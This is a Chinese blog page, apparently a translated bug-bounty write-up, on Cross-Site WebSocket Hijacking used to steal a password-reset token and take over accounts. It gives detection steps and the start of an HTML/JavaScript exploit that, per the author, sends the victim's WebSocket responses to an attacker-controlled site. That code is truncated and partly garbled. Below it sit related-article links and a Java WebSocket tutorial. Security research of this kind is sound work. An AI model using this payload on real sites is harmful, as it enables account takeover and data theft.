url存在宽字节跨站漏洞_利用WebSocket跨站劫持(CSWH)漏洞接管帐户

最新推荐文章于 2024-04-20 23:39:38 发布
最新推荐文章于 2024-04-20 23:39:38 发布
阅读量261 收藏
点赞数
文章标签: url存在宽字节跨站漏洞 websocket onmessage后回执 websocket测试网页 websocket登录验证
0dcb43508dd7bdbd8c96d27ae8c969c3.png

在一次漏洞悬赏活动中,我发现了一个使用WebSocket连接的应用,所以我检查了WebSocket URL,发现它很容易受到CSWH的攻击(WebSocket跨站劫持)

有关CSWH的更多详细信息,可以访问以下链接了解

https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html

首先,我们假设一个应用是通过以下URL建立websocket连接的 wss://website.com。关于验证URL是否存在CSWH漏洞可以遵循以下步骤:

  1. 在浏览器上打开Web应用并登录。
  2. 在新选项卡中输入http://websocket.org/echo.html,输入WebSocket URL并单击“连接”。
  3. 建立连接后,你必须能够从此页面向服务器发送数据帧。接着,使用burpsuite的proxy捕获websocket数据帧进行调试,多次发送,查看服务器如何响应。如果burp的回应和网页的回应一样,则表示目标很可能容易受到WebSocket跨站劫持的攻击
326df8f03980177ad9fea6a1f84dba5c.png

通过以上步骤,我确定应用存在CSWH漏洞。

一旦在新选项卡上建立了WebSocket连接,我就收到了下面的websocket响应

ede207c08e897be6a0b629657e71ae88.png

从上述响应中你可看到,参数“_forgotPasswordId”的值为“null”。

现在我需要“_forgotPasswordId”参数来发送恶意请求来重置密码。

58f19ff24cc7a6a499541b0d89232ad9.png

我再次测试了Websocket连接,这次观察到了如下回应,它包含一个forgetPasswordID令牌

07e4818cbd7c86372c4be5157d1dc8df.png

利用

现在准备CSWH漏洞的利用链,重置密码接管帐户。以下由HTML代码组成的payload会发送XHR请求,并把回应导向攻击者控制的站点。

 Testing var wsUri = "wss://host.com"; var output; function init() { output = document.getElementById("output"); testWebSocket(); } function testWebSocket() { websocket = new WebSocket(wsUri); websocket.onopen = function(evt) { onOpen(evt) }; websocket.onclose = function(evt) { onClose(evt) }; websocket.onmessage = function(evt) { onMessage(evt) }; websocket.on error = function(evt) { on error(evt) }; } function onOpen(evt) { writeToScreen("CONNECTED"); doSend('websocket fr ame '); } function onClose(evt) { writeToScreen("DISCONNECTED"); } function onMessage(evt) {var xhr = new xm lHttpRequest();xhr.open("POST
weixin_39864738
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
检测目标url存在字节跨站漏洞_通用型漏洞审计浅析
weixin_39844426的博客
12-08 1224
一次性付费进群,长期免费索取教程,没有付费教程。进微信群回复公众号:微信群;QQ群:460500587教程列表见微信公众号底部菜单 |本文底部有推荐书籍微信公众号:计算机与网络安全ID:Computer-network安全漏洞审计,作为扫描器的核心功能,会告诉扫描器如何去检测和审计漏洞。它可以看作扫描器的大脑,通过对每一种漏洞进行场景化学习,从中提取漏洞的扫描特征,将其存储到扫...
JavaScript 常见安全漏洞和自动化检测技术
10-23
js安全漏洞目前存在较大的技术难题,本文结合案例给大家详解JavaScript 常见安全漏洞和自动化检测技术,需要的朋友可以参考下
XSS跨站脚本攻击在Java开发中防范的方法
conkeyn的专栏
02-27 501
详细描述 跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息或在终端用户系统上执行恶意代码。 成功的跨站脚本攻击所带来的主要问题包括: 帐号劫持 - 攻击者可以在会话cookie过期之前劫持用户的会话,并以访问ULR用户的权限执行操作,如发布数据库查...
目标URL存在跨站漏洞_检测目标url存在跨站漏洞,2024年最新2024年网络安全知识体系总结
最新发布
2401_83739284的博客
04-20 978
例如,如果数据是由用户输入的,存储在数据库中,然后再重新显示,就必须要确保在每次检索的时候都能正确编码。如果必须允许站点用户使用HTML标签,如允许用户使用的格式化标签的公告栏,则应限制可使用的标签。服务器端编码指的是首先通过编码函数发送所有的动态内容,使用所选择字符集中的代码替换Scripting标签,这可以帮助防范跨站脚本攻击。推荐措施包括实施安全编程技术确保正确过滤用户提供的数据,并编码所有用户提供的数据以防以可执行的格式向终端用户发送注入的脚本。这可以防范以可执行的方式向终端用户发送注入的脚本。
url存在字节跨站漏洞_漏洞那些事er 反射型跨站脚本攻击
weixin_39640543的博客
12-10 570
跨站脚本攻击(Cross Site Scripting,缩写为XSS)本质上仍是注入攻击的一种。当实施此类攻击时,攻击者通过直接或间接的方式,向WEB应用提交包含恶意代码数据,而WEB应用未对提交数据进行合法性验证或转义处理,最终致使恶意代码在被攻击者的浏览器中执行。 跨站脚本是所有WEB应用安全漏洞中最常见的一种,一些安全公司的统计数据显示,其数量占据了WE...
url存在字节跨站漏洞_开发者必读篇之Web漏洞防护指南
weixin_39625468的博客
11-29 489
专注于Java领域优质技术,欢迎关注作者:想要好看的 图灵社区本文配图来自美剧《黑客军团 第3季》。web的发展史早期的互联网非常的单调,一般只有静态页面,现在,随着技术的发展,web上大多数站点实际上是web应用程序,在服务器和浏览器之间进行双向的信息传递。他们支持注册登录,金融交易,搜索及用户创作的内容。用户只需要拥有一个浏览器,就能实现各种功能。Web是指一个网站的前端页面到后端服务,比如我...
Web漏洞处理--http host头攻击漏洞处理方案/检测目标URL存在字节跨站漏洞/ 检测目标URL存在SQL注入漏洞
wjs040的博客
06-18 4361
1.配置web 拦截器 <filter> <filter-name>XssSqlFilter</filter-name> <filter-class>com.modules.sys.security.SessionFilter</filter-class> //拦截器的位置 </filter>...
WebSocket服务器.rar_C websocket_c++WEBSOCKET_websocket_websocket
07-14
websocket server in c++.
WebSocket.zip_C# WebSocket_C++ websocket_websocket_工程管理
07-15
这是一个用c##写的websocket 写的例子
DelphiWebsockets-master.zip_delphi websocket_websocket_websocket
07-14
WebSocket for Delphi
WebSocket-Server.zip_VC WebSocket_VC websocket_https server_sti
07-14
vc编写的websocket server 源码 ,支持http,https
Java包含常见web漏洞测试项目
12-06
一个包含web常见漏洞的maven 项目。JDK8 +springMVC+JDBC+mybatis+mysql。使用Eclipse导入maven项目,用sql创建数据库和表,修改数据库连接密码。即可运行。有兴趣的可以研究测试
websocket_assistant.rar_MFC websocket_mfc+websocket_websocket_w
07-15
websocket client by MFC
url存在字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0
weixin_39738152的博客
12-04 703
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴周五晚上好~终于到了XSS漏洞的完结篇啦~~感觉本公众号写的最多的就是XSS,现在可以告一段落了...让我们来看看第一版XSS漏洞总结吧!Part.0目录目录一、XSS概述什么是XSS?二、XSS的分类XSS的三种类型反射型XSS存储型XSSDOM型XSSDVWA平台通关三、XSS的利用利用XSS盗取用户cookie利用XSS进行网页...
url存在字节跨站漏洞_跨站脚本攻击实验室:0l4bs
weixin_39907762的博客
12-01 169
web 安全中最常见的漏洞之一:跨站脚本攻击漏洞,也就是 XSS 漏洞。这个实验室是为 web 应用程序安全爱好者设计的,一个用 XSS 带给你快乐的地方。0l4bsWeb 应用程序安全爱好者的跨站脚本实验室,目前包含 20 个挑战。挑战列表URLFormUser-AgentReferrerCookie本地存储登录页面文件上传Base64 编码删除 alert删除 scriptPreg_repla...
url存在字节跨站漏洞_PHPCMS漏洞之v9字节注入问题
weixin_39568706的博客
12-11 339
关于阿里云提示“phpcmsv9字节注入问题”的漏洞修复方案简介:漏洞名称:phpcmsv9字节注入问题漏洞描述:phpcmsv9.5.9以后版本开始默认使用mysqli支持,在phpcms/modules/pay/respond.php中,因为代码逻辑不够严谨,导致字节注入。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/...
url存在字节跨站漏洞_前端XSS漏洞攻击竟然这么厉害
weixin_39917291的博客
12-03 373
你好,是我琉忆。今天我们聊聊作为开发都可能会遇到的XSS漏洞攻击。如果你不知道这个漏洞,那么你编写的代码多数可能存在问题,可能一不小心就中招。为什么会突然聊这个呢,是因为这个XSS漏洞在大部分的网站中都存在。即使是知名的网站也没有避免中招(等下罗列相应的网站)。那么XSS漏洞到底是什么?它是如何攻击的?我们应该如何防御?01XSS攻击是什么?XSS攻击:跨站脚本攻击(Cross Site...
websocket 教程 java_java websocket学习
05-26
好的,下面是 Java 中 WebSocket 的学习教程: 1. WebSocket 概述 WebSocket 是一种在单个 TCP 连接上进行双向通信的协议。它可以让我们实现实时的 Web 应用程序,而不需要复杂的轮询或长轮询机制。 在 WebSocket 中,客户端和服务器之间可以发送任意数量的消息,并且这些消息都是异步发送和接收的。这使得 WebSocket 成为实现实时应用程序的理想选择。 2. WebSocket API Java 中的 WebSocket API 由以下类和接口组成: - `javax.websocket.Session`:代表一个 WebSocket 连接。 - `javax.websocket.Endpoint`:WebSocket 终端点,用于处理 WebSocket 连接和消息。 - `javax.websocket.MessageHandler`:用于处理 WebSocket 消息的接口。 - `javax.websocket.server.ServerEndpoint`:标注在 WebSocket 服务器端点类上,声明一个 WebSocket 服务端点。 - `javax.websocket.server.ServerEndpointConfig`:WebSocket 服务端点配置类,用于配置 WebSocket 服务器端点。 3. 实现 WebSocket 服务端 要实现一个 WebSocket 服务端,需要完成以下步骤: - 创建一个继承 `javax.websocket.Endpoint` 类的 WebSocket 终端点类。 - 在 WebSocket 终端点类中实现 `onOpen`、`onClose`、`onError` 和 `onMessage` 方法,用于处理 WebSocket 连接和消息。 - 使用 `@ServerEndpoint` 注解标注 WebSocket 终端点类,将其暴露为 WebSocket 服务端点。 下面是一个简单的 WebSocket 服务端实现示例: ```java @ServerEndpoint("/websocket") public class WebSocketServer { @OnOpen public void onOpen(Session session) { System.out.println("WebSocket opened: " + session.getId()); } @OnClose public void onClose(Session session) { System.out.println("WebSocket closed: " + session.getId()); } @OnError public void onError(Session session, Throwable error) { System.err.println("WebSocket error: " + error); } @OnMessage public void onMessage(String message, Session session) { System.out.println("WebSocket message received: " + message); try { session.getBasicRemote().sendText("Received message: " + message); } catch (IOException e) { e.printStackTrace(); } } } ``` 4. 实现 WebSocket 客户端 要实现一个 WebSocket 客户端,需要完成以下步骤: - 创建一个继承 `javax.websocket.Endpoint` 类的 WebSocket 终端点类。 - 在 WebSocket 终端点类中实现 `onOpen`、`onClose`、`onError` 和 `onMessage` 方法,用于处理 WebSocket 连接和消息。 - 使用 `javax.websocket.WebSocketContainer` 接口的 `connectToServer` 方法连接到 WebSocket 服务端点。 下面是一个简单的 WebSocket 客户端实现示例: ```java public class WebSocketClient extends Endpoint { @Override public void onOpen(Session session, EndpointConfig config) { System.out.println("WebSocket opened: " + session.getId()); try { session.getBasicRemote().sendText("Hello, server!"); } catch (IOException e) { e.printStackTrace(); } } @Override public void onClose(Session session, CloseReason closeReason) { System.out.println("WebSocket closed: " + session.getId()); } @Override public void onError(Session session, Throwable error) { System.err.println("WebSocket error: " + error); } @Override public void onMessage(String message, Session session) { System.out.println("WebSocket message received: " + message); try { session.close(); } catch (IOException e) { e.printStackTrace(); } } public static void main(String[] args) { WebSocketContainer container = ContainerProvider.getWebSocketContainer(); String uri = "ws://localhost:8080/websocket"; try { container.connectToServer(new WebSocketClient(), URI.create(uri)); } catch (DeploymentException | IOException e) { e.printStackTrace(); } } } ``` 5. 总结 这就是 Java 中 WebSocket 的学习教程,我们学习了如何实现 WebSocket 服务端和客户端,并使用 `javax.websocket` 包中的类和接口来处理 WebSocket 连接和消息。希望这个教程对你有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值